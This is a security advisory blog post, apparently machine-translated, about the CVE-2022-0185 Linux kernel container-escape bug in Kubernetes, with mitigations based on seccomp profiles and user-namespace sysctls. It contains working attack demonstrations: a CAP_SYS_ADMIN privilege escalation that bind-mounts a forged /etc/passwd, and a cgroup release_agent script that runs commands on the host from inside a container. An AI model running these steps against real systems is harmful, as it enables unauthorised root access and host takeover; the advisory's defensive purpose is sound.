High risk! ! Kubernetes new container escape vulnerability warning

Author: Michelangelo, KubeSphere evangelist, cloud native heavily infected person

On January 18, 2022, Linux maintainers and vendors discovered a heap buffer overflow vulnerability with ID number in the legacy_parse_param function of the filesystem context function of the Linux kernel (5.1-rc1+) 2022-0185 , which is a high-risk vulnerability with a severity level of 7.8 .

The vulnerability allows out-of-bounds writes in kernel memory. Exploiting this vulnerability, an unprivileged attacker can bypass any Linux namespace restrictions and escalate their privileges to root. For example, if an attacker infiltrates your container, they can escape from the container and escalate privileges.

The vulnerability was introduced into Linux kernel 5.1-rc1 version in March 2019. A patch released on January 18 fixes the problem, and all Linux users are advised to download and install the latest version of the kernel.

Vulnerability Details

The vulnerability is caused by an integer underflow condition found in the legacy_parse_param function of the file system context function (fs/fs_context.c). The function of the filesystem context is to create the superblock for mounting and remounting the filesystem. The superblock records the characteristics of a filesystem, such as block and file size, and any storage blocks.

By sending more than 4095 bytes of input to the legacy_parse_param function, the input length detection can be bypassed, resulting in an out-of-bounds write, triggering the vulnerability. An attacker could exploit this vulnerability to write malicious code to other parts of memory, crash the system, or execute arbitrary code to escalate privileges.

legacy_parse_param The input data for the function is added via the fsconfig system call to configure the filesystem's creation context (such as the superblock for ext4 filesystems).

// 使用 fsconfig 系统调用添加由 val 指向的以空字符（NULL）结尾的字符串
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

To use the fsconfig system call, an unprivileged user must have at least CAP_SYS_ADMIN privileges in their current namespace. This means that if a user could enter another namespace with these permissions, it would be sufficient to exploit the vulnerability.

If an unprivileged user cannot obtain the CAP_SYS_ADMIN permission, an attacker can obtain it through the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. The Unshare system call allows the user to create or clone a namespace or user with the necessary permissions for further attacks. This technique is important for the and container worlds using Linux namespaces to isolate pods, and attackers can fully exploit this in a container escape attack. Once successful, an attacker can gain access to the host OS and the Full control permissions for all containers , so as to further attack other machines in the internal network segment, can even deploy malicious containers in the Kubernetes cluster.

The research team that discovered the vulnerability published the code and proof of concept exploiting the vulnerability on GitHub on January 25.

PoC

Docker and other container runtimes use the Seccomp profile by default to prevent processes in the container from using dangerous system calls to protect Linux namespace boundaries.

Seccomp (full name: secure computing mode) was introduced into the Linux kernel in version 2.6.12 (March 8, 2005), limiting the system calls available to a process to four: read, write, _exit, and sigreturn. The original mode was a whitelist mode, in which, in addition to the open file descriptors and the four allowed system calls, the kernel would use SIGKILL or SIGSYS to terminate the process if other system calls were attempted.

However, Kubernetes by default does not use any Seccomp or AppArmor/SELinux configuration files to restrict the system calls of Pods, which is very dangerous. Processes in Pods can freely access dangerous system calls and wait for the necessary privileges (such as CAP_SYS_ADMIN). ) for further attacks.

Let's start with a Docker example. In a standard Docker environment, the unshare command is not available. Docker's Seccomp filter blocks the system call used by this command.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Let's take a look at the Pod of Kubernetes:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

It can be seen that the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain the CAP_SYS_ADMIN capability through the unshare command.

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh

So what can you do with CAP_SYS_ADMIN? Here are two examples showing how CAP_SYS_ADMIN can be used to infiltrate a system.

Ordinary users are elevated to root users!

The following operation can directly escalate ordinary users in the host to root users.

First give python3 the capability of CAP_SYS_ADMIN (note that soft links cannot be operated, only original files can be operated).

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a regular user.

$ useradd test -d /home/test -m

Then switch to the normal user and enter the user's home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and change the root user's password to " password ".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# 将第一行的 root:x 改为 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Mount the modified passwd file to /etc/passwd .

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

$ python3 mount-passwd.py

The last is the moment to witness the miracle! ! ! switch directly to the root user and enter the password "password".

$ su root
Password: 
root@coredns:/home/test#

Amazing, switch to root user. . .

Let's see if we really have root privileges:

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Hmm, root is right.

Finally, remember to uninstall /etc/passwd.

$ umount /etc/passwd

So, System Reboot Engineers, hurry up and see if the ordinary users you assign to others have the CAP_SYS_ADMIN capability~~

View all processes on the host in the container!

Let's look at an example of a container. The following operation allows you to get all the processes running on the host in the container.

We don't need to use the --privileged parameter to run privileged containers, that would be boring.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Next, execute the following command in the container. The final effect is to execute the ps aux command on the host and save its output to the /output file in the container.

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

Eventually you can see all the processes running in the host in the container:

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

I will not explain the specific meanings of these commands. Those who are interested can study them by themselves.

It is certain that the CAP_SYS_ADMIN capability provides more possibilities for attackers, whether in the host or in the container, especially in the container environment. If we cannot upgrade the kernel due to force majeure, we must seek other solutions. .

solution

container level

Since v1.22, Kubernetes can use SecurityContext to add default Seccomp or AppArmor profiles to resource objects to secure Pods, Deployments, Statefulsets, Daemonsets, and more. While this feature is currently in Alpha, users can add their own Seccomp or AppArmor profile and define it in the SecurityContext. E.g:

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to use unshare to get the CAP_SYS_ADMIN capability.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call is successfully blocked, making it impossible for an attacker to exploit this capability.

host level

Another solution is to disable the user's ability to use the user namespace from the host level without restarting the system. For example, in Ubuntu, just execute the following two lines to take effect immediately, and it will take effect after restarting the system.

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

If it is a Red Hat system, you can execute the following command to achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

Summarize the suggestions for dealing with this vulnerability:

If your environment can accept patching the kernel, and can accept rebooting the system, it is best to patch, or upgrade the kernel.
Reduce the use of privileged containers with access to CAP_SYS_ADMIN.
For unprivileged containers, make sure to have a Seccomp filter to block their calls to unshare to reduce risk. Docker is fine, Kubernetes needs extra action.
Seccomp profiles can be enabled for all workloads in a Kubernetes cluster in the future. At present, this feature is still in the Alpha stage and needs to be turned on through the feature gate .
Disables the ability for users to use the user namespace at the host level.

write at the end

The container environment is complex, especially for a distributed scheduling platform like Kubernetes. Each link has its own life cycle and attack surface, which easily exposes security risks. Container cluster administrators must pay attention to the security issues in every detail. In general, the security of containers in most cases depends on the security of the Linux kernel, so we need to keep an eye on any security issues and implement corresponding solutions as soon as possible.

References

CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit
CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
Excessive Capabilities
CAP_SYS_ADMIN
This article is published by the blog OpenWrite !

High risk! ! Kubernetes new container escape vulnerability warning

Vulnerability Details

PoC

Ordinary users are elevated to root users!

View all processes on the host in the container!

solution

container level

host level

write at the end

References

KubeSphere

引用和评论

国产化环境完美适配！离线部署 K8s 1.31.8 + KubeSphere 4.1.3（海光/兆芯 + 银河麒麟V10）

阿里云 ESA 游戏行业解决方案｜安全防护、加速、低延时的技术融合

云电竞巅峰对决：ToDesk/网易云/START实战测评，谁是真王者？

K3s + KubeSphere + DeepSeek 全流程部署指南：轻量 K8s 与 AI 大模型私有化实践

Linux系统安装更新Python3.x版本详细步骤

OpenAI 最后一代非推理模型：OpenAI 发布 GPT-4.5预览版

国产化环境下的 K8s 全离线部署：鲲鹏 + 麒麟 V10 + KubeSphere + Harbor